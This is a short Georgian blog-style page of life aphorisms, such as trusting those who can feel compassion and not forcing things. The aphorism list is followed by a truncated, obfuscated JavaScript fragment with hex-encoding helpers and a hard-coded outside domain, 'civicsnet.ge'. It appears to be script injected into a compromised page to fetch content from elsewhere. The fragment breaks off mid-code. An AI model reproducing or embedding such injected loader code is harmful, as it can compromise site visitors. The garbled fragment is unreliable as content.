ცხოვრებისეული წესები

, ენდე მას, ვისაც თანაგრძნობა შეუძლია

  1. არასოდეს გასცე ბრძანება, თუ დარწმუნებული არ ხარ, რომ შეასრულებენ

  2. ოცნებას ვერ შეჭამ, მაგრამ გაგაძღებს

  3. ნუ დაატან ძალას, ყველაფერი საუკეთესო მოულოდნელად ხდება

  4. გახდი უკეთესი და ეცადე გაიგო ვინ ხარ, სანამ ვინმეს შეხვდებოდე იმ იმედით, რომ გაგიგებს

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "civicsnet.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Leave a Reply